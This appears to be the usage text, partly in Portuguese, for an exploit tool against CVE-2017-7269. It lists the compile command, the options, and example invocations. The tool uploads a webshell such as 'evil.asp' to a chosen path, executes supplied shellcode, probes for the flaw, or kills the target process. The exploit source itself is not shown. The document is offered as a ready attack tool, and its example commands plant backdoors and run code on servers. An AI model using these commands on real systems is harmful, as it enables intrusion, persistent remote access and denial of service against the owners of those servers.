
CVE-2017-7269 to webshell or shellcode loader
csc cve-2017-7269.cs
CVE-2017-7269 <url> [parms]
Cabeçalho:
-h <host> define o host para o cabeçalho [If]
-p <port> define a porta para o cabeçalho [If]
-s <scheme> define o esquema para o cabeçalho [If]
-l <length> comprimento do caminho físico
WebShell:
-w <webshell> envia webshell para o servidor
-wp <shellpath> caminho para salvar o webshell
ShellCode:
-c <shellcode> executa o shellcode
Diversos:
-t testa apenas vulnerabilidade.
-e sai do processo ao obter shell ou testar
-k mata o alvo (equivalente a -e e -t)
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin